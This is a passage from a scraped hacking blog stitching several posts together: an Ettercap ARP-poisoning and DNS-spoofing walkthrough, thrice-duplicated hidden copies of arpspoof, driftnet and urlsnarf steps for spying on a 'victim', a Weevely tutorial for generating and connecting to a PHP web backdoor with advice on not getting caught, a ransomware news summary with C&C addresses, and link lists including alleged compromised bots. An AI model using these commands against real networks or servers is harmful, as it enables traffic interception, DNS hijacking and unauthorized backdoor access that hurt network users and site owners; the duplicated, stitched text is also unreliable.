<img alt="" class="aligncenter size-full wp-image-10707" height="313" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap7.png" title="ettercap start sniffing" width="597" /><br />
Now Arp is poisoned, i.e, 122 machine starts to send ARP packets
saying “I’m 1.10″. In-order to verify it, From 192.168.1.51 “ping
192.168.1.10″. Open “Wireshark” application in 192.168.1.122 machine,
and put a filter for ICMP. You will get the ICMP packets from
192.168.1.51 to 192.168.1.10 in 192.168.1.122 as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10708" height="182" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap-wireshark.png" title="ettercap wireshark" width="505" /><br />
<h3>
Launching DNS Spoofing Attack in LAN</h3>
The concept of DNS is as follows.<br />
<ul>
<li>Machine A said ‘ping google.com’</li>
<li>Now it has to find that IP address of google.com</li>
<li>So it queries the DNS server with regard to the IP address for the domain google.com</li>
<li>The DNS server will have its own hierarchy, and it will find the IP address of google.com and return it to Machine A</li>
</ul>
Here we will see how we can spoof the DNS.<br />
There are many plugins which comes by default with EtterCap. Once
such plugin is called as DNSSpoof. We are going to use that plugin to
test the DNS spoofing.<br />
Open the /usr/share/ettercap/etter.dns in the 122 machine and add the following,<br />
<pre>*.google.co.in A 192.168.1.12
*.google.com A 192.168.1.12
google.com A 192.168.1.12
www.google.com PTR 192.168.1.12
www.google.co.in PTR 192.168.1.12</pre>
Here, 192.168.1.10 acts as the DNS server. In-order to perform DNS
spoofing, first we need to do the ARP poisoning as explained above. Once
ARP is done, follow the below steps<br />
Click “Plugins->Manage Plugins” as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10709" height="176" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap8.png" title="ettercap manage plugins" width="599" /><br />
Select the “dns_spoof” plugin and double click to activate it as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10710" height="464" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap9.png" title="ettercap dns spoof plugin" width="600" /><br />
Now from 192.168.1.51 ping google.com<br />
<pre>$ ping google.com
PING google.com (192.168.1.12) 56(84) bytes of data.
64 bytes from www.google.co.in (192.168.1.12): icmp_seq=1 ttl=64 time=3.56 ms
64 bytes from www.google.co.in (192.168.1.12): icmp_seq=2 ttl=64 time=0.843 ms
64 bytes from www.google.co.in (192.168.1.12): icmp_seq=3 ttl=64 time=0.646 ms</pre>
You can see that it returns a local machine’s IP address which we have given in the configuration.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" class="aligncenter size-full wp-image-10711" height="188" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap11.png" title="ettercap stop mitm attack" width="598" /></a></div>
Hope this articles provides some insight into ARP Poisoning and DNS
Spoofing. Once everything is done, remember to stop MITM attack as
follows:<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
stop the mitm attacks as above and ensure that it was safe<br />
<br />
<br />
The other things which you can do were spoof the arp and sniff the network traffic it can be done as follows :<br />
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
1. Open your terminal (CTRL + ALT + T <a href="http://www.hacking-tutorial.com/tips-and-trick/how-to-create-keyboard-shortcuts-on-kali-linux/" target="_blank" title="How to create keyboard shortcut on Kali Linux">kali shortcut</a>) and configure our <a href="http://www.hacking-tutorial.com/tag/kali-linux/">Kali Linux</a> machine to allow packet forwarding, because act as man in the middle attacker, <a href="http://www.hacking-tutorial.com/tag/kali-linux/">Kali Linux</a> must act as router between "real router" and the victim. Read the tutorial here <a href="http://www.hacking-tutorial.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/" target="_blank">how to set up packet forwarding in linux</a>.<br />
2. You can change your terminal interface to make the view much more friendly and easy to monitor by <a href="http://www.hacking-tutorial.com/tips-and-trick/split-kali-linux-terminal-window/" target="_blank">splitting kali linux terminal window</a>.<br />
3. The next step is setting up arpspoof between victim and router.<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">arpspoof -i eth0 -t 192.168.8.90 192.168.8.8</span></span></blockquote>
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6261" height="130" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm2.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="665" /><br />
4. And then setting up arpspoof from to capture all packet from router to victim.<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">arpspoof -i eth0 192.168.8.8 192.168.8.90</span></span></blockquote>
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6262" height="128" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm3.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="667" /><br />
5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.<br />
6. Now we can try to use driftnet to monitor all victim image traffic. According to its <a href="http://www.ex-parrot.com/%7Echris/driftnet/" target="_blank">website</a>,<br />
<blockquote>
Driftnet is a program which listens to network traffic and picks out
images from TCP streams it observes. Fun to run on a host which sees
lots of web traffic.</blockquote>
7. To run driftnet, we just run this<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">driftnet -i eth0</span></span></blockquote>
When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.<br />
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6263" height="400" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm4.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="351" /><br />
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal<br />
8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">urlsnarf -i eth0</span></span></blockquote>
and urlsnarf will start capturing all website address visited by victim machine.<br />
9. When victim browse a website, attacker will know the address victim visited.<br />
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6264" height="251" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm5.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="677" /><br />
<br />
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.syd0aEqI.dpuf</div>
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
1. Open your terminal (CTRL + ALT + T <a href="http://www.hacking-tutorial.com/tips-and-trick/how-to-create-keyboard-shortcuts-on-kali-linux/" target="_blank" title="How to create keyboard shortcut on Kali Linux">kali shortcut</a>) and configure our <a href="http://www.hacking-tutorial.com/tag/kali-linux/">Kali Linux</a> machine to allow packet forwarding, because act as man in the middle attacker, <a href="http://www.hacking-tutorial.com/tag/kali-linux/">Kali Linux</a> must act as router between "real router" and the victim. Read the tutorial here <a href="http://www.hacking-tutorial.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/" target="_blank">how to set up packet forwarding in linux</a>.<br />
2. You can change your terminal interface to make the view much more friendly and easy to monitor by <a href="http://www.hacking-tutorial.com/tips-and-trick/split-kali-linux-terminal-window/" target="_blank">splitting kali linux terminal window</a>.<br />
3. The next step is setting up arpspoof between victim and router.<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">arpspoof -i eth0 -t 192.168.8.90 192.168.8.8</span></span></blockquote>
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6261" height="130" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm2.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="665" /><br />
4. And then setting up arpspoof from to capture all packet from router to victim.<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">arpspoof -i eth0 192.168.8.8 192.168.8.90</span></span></blockquote>
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6262" height="128" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm3.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="667" /><br />
5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.<br />
6. Now we can try to use driftnet to monitor all victim image traffic. According to its <a href="http://www.ex-parrot.com/%7Echris/driftnet/" target="_blank">website</a>,<br />
<blockquote>
Driftnet is a program which listens to network traffic and picks out
images from TCP streams it observes. Fun to run on a host which sees
lots of web traffic.</blockquote>
7. To run driftnet, we just run this<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">driftnet -i eth0</span></span></blockquote>
When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.<br />
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6263" height="400" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm4.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="351" /><br />
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal<br />
8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">urlsnarf -i eth0</span></span></blockquote>
and urlsnarf will start capturing all website address visited by victim machine.<br />
9. When victim browse a website, attacker will know the address victim visited.<br />
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6264" height="251" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm5.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="677" /><br />
<br />
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.syd0aEqI.dpuf</div>
<br />
<br />
The second part would be using the sniffed traffic <br />
<br />
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
1. Open your terminal (CTRL + ALT + T <a href="http://www.hacking-tutorial.com/tips-and-trick/how-to-create-keyboard-shortcuts-on-kali-linux/" target="_blank" title="How to create keyboard shortcut on Kali Linux">kali shortcut</a>) and configure our <a href="http://www.hacking-tutorial.com/tag/kali-linux/">Kali Linux</a> machine to allow packet forwarding, because act as man in the middle attacker, <a href="http://www.hacking-tutorial.com/tag/kali-linux/">Kali Linux</a> must act as router between "real router" and the victim. Read the tutorial here <a href="http://www.hacking-tutorial.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/" target="_blank">how to set up packet forwarding in linux</a>.<br />
2. You can change your terminal interface to make the view much more friendly and easy to monitor by <a href="http://www.hacking-tutorial.com/tips-and-trick/split-kali-linux-terminal-window/" target="_blank">splitting kali linux terminal window</a>.<br />
3. The next step is setting up arpspoof between victim and router.<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">arpspoof -i eth0 -t 192.168.8.90 192.168.8.8</span></span></blockquote>
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6261" height="130" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm2.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="665" /><br />
4. And then setting up arpspoof from to capture all packet from router to victim.<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">arpspoof -i eth0 192.168.8.8 192.168.8.90</span></span></blockquote>
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6262" height="128" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm3.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="667" /><br />
5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.<br />
6. Now we can try to use driftnet to monitor all victim image traffic. According to its <a href="http://www.ex-parrot.com/%7Echris/driftnet/" target="_blank">website</a>,<br />
<blockquote>
Driftnet is a program which listens to network traffic and picks out
images from TCP streams it observes. Fun to run on a host which sees
lots of web traffic.</blockquote>
7. To run driftnet, we just run this<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">driftnet -i eth0</span></span></blockquote>
When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.<br />
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6263" height="400" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm4.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="351" /><br />
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal<br />
8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">urlsnarf -i eth0</span></span></blockquote>
and urlsnarf will start capturing all website address visited by victim machine.<br />
9. When victim browse a website, attacker will know the address victim visited.<br />
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6264" height="251" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm5.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="677" /><br />
<br />
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.syd0aEqI.dpuf</div>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-39785445900587846052015-09-04T12:05:00.002+05:302015-09-04T12:05:34.474+05:30Browse onion urls without tor<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
today i wish to share the trick to browse onion urls without installing tor browser<br />
<br />
<br />
Use the following link :<br />
<br />
http://www.onion.link/<br />
<br />
Imp note :<br />
<br />
it would be redirected through "cse.google.com" <br />
<br />
About onion.link[remember] :<br />
<br />
<ol>
<li>OnionLink allows regular Internet users to access
onionsites. Unfortunately, this requires sacrificing most of Tor's
privacy protections.</li>
<li>OnionLink provides <i><b>much less security, anonymity, and confidentiality</b></i> than using the <a href="https://www.torproject.org/download/download-easy.html.en">Tor Browser Bundle</a> (TBB). If convenience or speed is not the deciding factors, you should <i>always</i> choose the TBB over OnionLink.</li>
<li>Although publishers remain anonymous, when you use OnionLink your internet service provider <i>can see what content you are accessing</i>.</li>
<li>OnionLink trades privacy for speed and convenience. Do not use
OnionLink if others discovering which onionsites you visit would be
legally perilous</li>
</ol>
The above link would help you to browse onion urls without tor browser<br />
<br />
some onion urls were :<br />
<br />
<div>
<a href="http://3g2upl4pq6kufc4m.onion/" rel="no-follow" target="_blank">http://3g2upl4pq6kufc4m.onion/ </a> – DuckDuckGo Search Engine</div>
<div>
<a href="http://xmh57jrzrnw6insl.onion/" rel="no-follow" target="_blank">http://xmh57jrzrnw6insl.onion/</a> – TORCH – Tor Search Engine</div>
<div>
<a href="http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page" rel="no-follow" target="_blank">http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page</a> – Uncensored Hidden Wiki</div>
<div>
<a href="http://32rfckwuorlf4dlv.onion/" rel="no-follow" target="_blank">http://32rfckwuorlf4dlv.onion/</a> – Onion URL Repository</div>
<div>
<a href="http://e266al32vpuorbyg.onion/bookmarks.php" rel="no-follow" target="_blank">http://e266al32vpuorbyg.onion/bookmarks.php</a> – Dark Nexus</div>
<div>
<a href="http://5plvrsgydwy2sgce.onion/" rel="no-follow" target="_blank">http://5plvrsgydwy2sgce.onion/</a> – Seeks Search</div>
<div>
<a href="http://2vlqpcqpjlhmd5r2.onion/" rel="no-follow" target="_blank">http://2vlqpcqpjlhmd5r2.onion/</a> – Gateway to Freenet</div>
<div>
<a href="http://nlmymchrmnlmbnii.onion/" rel="no-follow" target="_blank">http://nlmymchrmnlmbnii.onion/</a> – Is It Up?</div>
<div>
<a href="http://kpynyvym6xqi7wz2.onion/links.html" rel="no-follow" target="_blank">http://kpynyvym6xqi7wz2.onion/links.html</a> – ParaZite</div>
<div>
<a href="http://wiki5kauuihowqi5.onion/" rel="no-follow" target="_blank">http://wiki5kauuihowqi5.onion/</a> – Onion Wiki</div>
<div>
<a href="http://torwikignoueupfm.onion/index.php?title=Main_Page" rel="no-follow" target="_blank">http://torwikignoueupfm.onion/index.php?title=Main_Page</a> – Tor Wiki</div>
<div>
<a href="http://kpvz7ki2v5agwt35.onion/" rel="no-follow" target="_blank">http://kpvz7ki2v5agwt35.onion</a> – The Hidden Wiki</div>
<div>
<a href="http://idnxcnkne4qt76tg.onion/" rel="no-follow" target="_blank">http://idnxcnkne4qt76tg.onion/</a> – Tor Project: Anonymity Online</div>
<div>
<a href="http://torlinkbgs6aabns.onion/" rel="no-follow" target="_blank">http://torlinkbgs6aabns.onion/</a> – TorLinks</div>
<div>
<a href="http://jh32yv5zgayyyts3.onion/" rel="no-follow" target="_blank">http://jh32yv5zgayyyts3.onion/</a> – Hidden Wiki .Onion Urls</div>
<div>
<a href="http://wikitjerrta4qgz4.onion/" rel="no-follow" target="_blank">http://wikitjerrta4qgz4.onion/</a> – Hidden Wiki – Tor Wiki</div>
<div>
<a href="http://xdagknwjc7aaytzh.onion/" rel="no-follow" target="_blank">http://xdagknwjc7aaytzh.onion/</a> – Anonet Webproxy</div>
<div>
<a href="http://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page" rel="no-follow" target="_blank">http://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page</a> – All You’re Wiki – clone of the clean hidden wiki that went down with freedom hosting</div>
<div>
<a href="http://3fyb44wdhnd2ghhl.onion/" rel="no-follow" target="_blank">http://3fyb44wdhnd2ghhl.onion/</a> – All You’re Base</div>
<div>
<a href="http://j6im4v42ur6dpic3.onion/" rel="no-follow" target="_blank">http://j6im4v42ur6dpic3.onion/</a> – TorProject Archive</div>
<div>
<a href="http://p3igkncehackjtib.onion/" rel="no-follow" target="_blank">http://p3igkncehackjtib.onion/</a> – TorProject Media</div>
<div>
<a href="http://kbhpodhnfxl3clb4.onion/" rel="no-follow" target="_blank">http://kbhpodhnfxl3clb4.onion</a> – Tor Search</div>
<div>
<a href="http://cipollatnumrrahd.onion/" rel="no-follow" target="_blank">http://cipollatnumrrahd.onion/</a> – Cipolla 2.0 (Italian)</div>
<div>
<a href="http://dppmfxaacucguzpc.onion/" rel="no-follow" target="_blank">http://dppmfxaacucguzpc.onion/</a> – TorDir – One of the oldest link lists on Tor</div>
<div>
</div>
<div>
</div>
<div>
For more links use the following :</div>
<div>
</div>
<div>
http://thehiddenwiki.org/ </div>
<br /></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-67480696085801137662015-09-03T11:51:00.002+05:302015-09-03T11:51:43.894+05:30Weevely tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
How to use weevely at kali linux tutorial :<br />
<br />
A backdoor in a computer system is a method of bypassing normal
authentication, securing unauthorized remote access to a computer,
obtaining access to plaintext, and so on, while attempting to remain
undetected. The backdoor may take the form of an installed program
(e.g., Back Orifice) or may subvert the system through a rootkit.<br />
That's
what pretty much happens when we all get root on Web Servers. "Hell
Yeah, We need Backdoors for next-time". Sometimes, we upload shells and
scripts for connect backs which are awesome.<br />
One-day i surfed to a
site, got the c99 source, copied it, tried saving it and Gosh the worst
happened to me: Windows and Avast won't let me save it because these
shells have their sources and signatures marked up as virus on nearly
every system.<br />
The Only way one get's a secure shell on a server is only through creating your own.<br />
Kali
Linux has the functionality to generate almost every backdoor type
depending on how u want it. { PHP, Android,Windows } to mention a few.<br />
But i would be basing on weevely for this post.<br />These shells won't be 100% undetectable but they could atleast get us a better and safe connect back.<br />
<strong>Weevely</strong> PHP Only<br />
<strong>Fire Up Kali</strong><br />Drop your consoles or terminals as u may prefer to call it and lets get some work-done.<br />
<strong>Weevely</strong><br />First hit weevely in your terminal to get the help interface<br />
> weevely<br />
<figure class="whtGallery" id="59610857docPartGal880003" role="group"><div class="gallery-layout" style="height: 393px; overflow: visible;">
<div class="gallery-layout-container">
<figure class="gal-row gal-row-f gal-wa" data-index="0" style="width: 532px;"><a href="http://img.wonderhowto.com/img/original/88/00/63553297496751/0/635532974967518800.jpg" rel="nofollow" target="_blank"><img alt="" src="http://img.wonderhowto.com/img/88/00/63553297496751/0/hiob-generate-web-backdoors-php-using-weevely-kali-linux.w654.jpg" style="height: 393px; margin-left: 0px; max-width: 532px; width: auto;" /></a></figure></div>
</div>
</figure> Yeah
that seems promising. Now to generate our back-door, Weevely allows us
to password protect our shell to prevent unauthorized access.<br />
We are generating a backdoor so we choose option 4 - Generate a PHP Backdoor.<br />> weevely generate skyvenom<br />
<figure class="whtGallery" id="16522949docPartGal880005" role="group"><div class="gallery-layout" style="height: 433px; overflow: visible;">
<div class="gallery-layout-container">
<figure class="gal-row gal-row-f gal-wa" data-index="0" style="width: 532px;"><a href="http://img.wonderhowto.com/img/original/50/62/63553298922904/0/635532989229045062.jpg" rel="nofollow" target="_blank"><img alt="" src="http://img.wonderhowto.com/img/50/62/63553298922904/0/hiob-generate-web-backdoors-php-using-weevely-kali-linux.w654.jpg" style="height: 433px; margin-left: 0px; max-width: 532px; width: auto;" /></a></figure></div>
</div>
</figure> Lets break this down<br />
weevely generate skyvenom simples tells:<br />weevely to generate a php shell with a password of "skyvenom" in the current directory.<br />
Hit ' ls ' in your terminal and you should see a weevely generated file.<br />> ls<br />
Now
you have your backdoor: How you get it onto a web server is not my part
so please try as much as possible not to get caught otherwise, hmm: Let
me be precise in betweeon 10 to 15 years in jail since hacking is now
considered a great threat to the systems now.<br />
Let's assume u got your shell on a web server, To connect to our shell we use<br />
> weevely weburl password<br />
>weevely http://10.0.2.2/tnb/weevely.php skyvenom<br />
<figure class="whtGallery" id="48034485docPartGal880007" role="group"><div class="gallery-layout" style="height: 456px; overflow: visible;">
<div class="gallery-layout-container">
<figure class="gal-row gal-row-f gal-wa" data-index="0" style="width: 532px;"><a href="http://img.wonderhowto.com/img/original/20/76/63553300356486/0/635533003564862076.jpg" rel="nofollow" target="_blank"><img alt="" src="http://img.wonderhowto.com/img/20/76/63553300356486/0/hiob-generate-web-backdoors-php-using-weevely-kali-linux.w654.jpg" style="height: 456px; margin-left: 0px; max-width: 532px; width: auto;" /></a></figure></div>
</div>
</figure> Hmm,
Its really awesome to get a shell on your localhost than any other
place in the world.As u can see : Have got a shell on the target in my
LAN. 10.0.2.2<br />
Ok, Guys. Have a nice day.<br />Note Only: For Educational Purposes,<br />
Hmm
i always see that shitty crap around: Educational Purposes : but to get
my butts safe from your works: For Education Purposes.<br />
Prompt me if i mistyped or made an error.</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com3tag:blogger.com,1999:blog-4509349481580895365.post-36450354955912034202015-09-02T12:41:00.001+05:302015-09-02T12:41:56.948+05:30ORX Locker a new ransomware<div dir="ltr" style="text-align: left;" trbidi="on">
<header class="entry-header">
<h2 class="entry-title">
Security experts at Sensecy have uncovered
ORX-Locker, a Darknet Ransomware-as-a-service platform that could allow
everyone to become a cyber criminal.</h2>
</header>
It is becoming even easier to become a cyber-criminal thanks to the model of sale known as <a href="http://securityaffairs.co/wordpress/15538/cyber-crime/attacks-as-a-service-maas-faas-different-terms-same-success-hystory.html" target="_blank">malware-as-a-service</a> that
offers off-the-shelf malware for rent or sale. Recently malware authors
started to offer also Ransomware-as-a-Service (RaaS), in August
security experts at McAfee discovered in the Deep Web a
ransomware-construction kit, dubbed <a href="http://securityaffairs.co/wordpress/37180/cyber-crime/tox-ransomware-builder.html" target="_blank">Tox ransomware platform</a> that allows easy to build malware in just 3 steps, implementing this model of sale.<br />
Now experts at Sensecy are warning of a new RaaS platform dubbed titled <a href="http://blog.sensecy.com/2015/08/30/orx-locker-a-darknet-ransomware-that-even-your-grandmother-can-use/" target="_blank">ORX-Locker</a>, it allows criminals to create their piece of malware to infect systems and request the payment of a fee to unlock the system.<br />
In RaaS model, when victims decide to pay, the malware redirects them
through a service provider that keeps a percent of the fee and forwards
the rest to the criminal.<br />
ORX implements a sophisticated AV evasion method and complex
communication techniques, the researchers discovered that it uses
universities and other platforms as control infrastructure.<br />
<strong>The First Appearance for the ORX ransomware is dated </strong>August 25, 2015, when a user dubbed <em>orxteam </em>announced the availability of a new RaaS service in a post.<br />
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/Team-Orx-RaaS-ransomware-message.png"><img alt="Team Orx RaaS ransomware message" class="aligncenter wp-image-39755" height="120" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/Team-Orx-RaaS-ransomware-message.png" width="500" /></a><br />
The team ORX developed a hidden service to implement the RaaS, the
experts highlight that the website requests a few details to new users.<br />
“To enter the site, new users just need to register. No email or
other identifying details are required. Upon registration, users have
the option to enter a referral username, which will earn them three
percent from every payment made to the new user.” state the post that
provides a detailed description of the ORX platform.<br />
In order to create a ransomware stub the users just need to add the
ID number (5 digits max) and the ransom price (ORX put a minimum of
$75), then they have to click the Build EXE button.<br />
The user can easily withdraw his earnings by transferring them to a
Bitcoin address by using the Wallet function. The Orx ransomware
platform also implements a friendly statistics on its users.<br />
The Orx Ransomware is a zip file containing the binary for the malware.<br />
The researchers at Sensecy have identified these addresses belonging the C&C infrastructure.<br />
<ol>
<li><em>130[.]75[.]81[.]251 – Leibniz University of Hanover</em></li>
<li><em>130[.]149[.]200[.]12 – Technical University of Berlin</em></li>
<li><em>171[.]25[.]193[.]9 – DFRI (Swedish non-profit and non-party organization working for digital rights)</em></li>
<li><em>199[.]254[.]238[.]52 – </em>Riseup<em> (Riseup provides online communication tools for people and groups working on liberatory social change)</em></li>
</ol>
The Orx ransomware encrypts the victim’s files and informs it about
the infection by displaying a popup message, it also creates on the
desktop a file containing the payment instruction.<br />
<img alt="orx platform message" class="aligncenter wp-image-39757" height="188" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/orx-platform-message.png" width="470" /><br />
The post published by the researchers at Sensecy includes also the Yara rule for the malware detection.<br />
<br />
<br />
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-24855263553036130752015-08-31T17:48:00.001+05:302015-08-31T17:49:22.346+05:30Sites to learn about hacking<div dir="ltr" style="text-align: left;" trbidi="on">
Testing and learning<br />
-----------------------<br />
http://hack.darkn3ss.com/<br />
<br />
http://link-base.org/<br />
<br />
http://ringzer0team.com/<br />
<br />
http://www.irongeek.com/<br />
<br />
https://hack.me/<br />
<br />
http://halls-of-valhalla.org/beta/challenges<br />
<br />
http://evilzone.org<br />
<br />
https://evilzone.org/wiki/index.php/The_big_ebook_index<br />
<br />
http://wecan.hasthe.technology/ <--- fuckin' down, AGAIN <br />
<br />
http://www.securitytube.net/<br />
<br />
http://null-byte.wonderhowto.com/how-to/<br />
<br />
http://n0where.net/<br />
<br />
http://www.offensive-security.com/metasploit-unleashed<br />
<br />
http://www.exploit-db.com/<br />
<br />
https://siph0n.net/<br />
<br />
http://www.cvedetails.com/<br />
<br />
http://resources.infosecinstitute.com/<br />
<br />
http://www.windowsecurity.com/articles-tutorials/<br />
<br />
http://www.securitysift.com/<br />
<br />
http://www.sans.org/reading-room/<br />
<br />
http://packetstormsecurity.com/files/<br />
<br />
https://www.corelan.be/index.php/articles/<br />
<br />
http://routerpwn.com/<br />
<br />
http://opensecuritytraining.info/Training.html<br />
<br />
https://www.blackhat.com/html/archives.html<br />
<br />
http://magazine.hitb.org/hitb-magazi<br />
<br />
http://gcc.godbolt.org/ <--- helpful for learning Assembly<br />
<br />
http://www.learninghowtohack.com/free-hacker-course/ <--- Sounds like he made it on his mom's computer, some useful information, but most is skid-like bullshit. <br />
<br />
https://www.vulnhub.com/<br />
<br />
https://wigle.net/ <--- Find wifi hotspots in your area<br />
<br />
http://blasze.tk/ <---Honey-pot maker<br />
<br />
shodanhq.com <-- find computers and servers<br />
<br />
http://blog.rchapman.org/post/36801038863/linux-system-call-table-for-x86-64 <br />
<br />
https://www.exploit-db.com/google-hacking-database/ <br />
<br />
http://greysec.net/<br />
<br />
https://www.owasp.org/index.php/Main_Page<br />
<br />
http://phrack.org/<br />
<br />
https://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html<br />
<br />
http://insecure.org/stf/smashstack.html<br />
<br />
http://securityoverride.org/forum/viewthread.php?thread_id=2672<br />
<br />
https://ipalyzer.com/ <-- decent recon tool <br />
<br />
http://pentestmonkey.net/<br />
<br />
https://wiki.skullsecurity.org/index.php?title=Main_Page<br />
<br />
https://nets.ec/Main_Page<br />
<br />
VIRUS/MALWARE<br />
-------------------------------------------<br />
http://www.openrce.org<br />
<br />
vxheavens.com<br />
<br />
offensivecomputing.net<br />
<br />
exploit-db.com<br />
<br />
inj3ct0r.com <br />
<br />
WARGAMES<br />
--------------------------------------------<br />
http://overthewire.org/wargames/ <--- great for beginners learning GNU/Linux <br />
<br />
https://www.pentesterlab.com/<br />
<br />
http://www.itsecgames.com/<br />
<br />
https://exploit-exercises.com/<br />
<br />
http://www.enigmagroup.org/<br />
<br />
http://smashthestack.org/<br />
<br />
http://3564020356.org/<br />
<br />
http://www.hackthissite.org/ <---great community <br />
<br />
http://www.hackertest.net/<br />
<br />
PWNED BOTS<br />
============================================================================================================<br />
http://185.12.44.55:8080/tasks<br />
http://45.55.82.110/findi/ <---- port 80 search engine <br />
<br />
DISTROS <br />
--------------------------------------------------------<br />
https://www.kali.org/<br />
<br />
http://sourceforge.net/projects/metasploitable/<br />
<br />
https://tails.boum.org/<br />
<br />
http://ophcrack.sourceforge.net/<br />
<br />
<br />
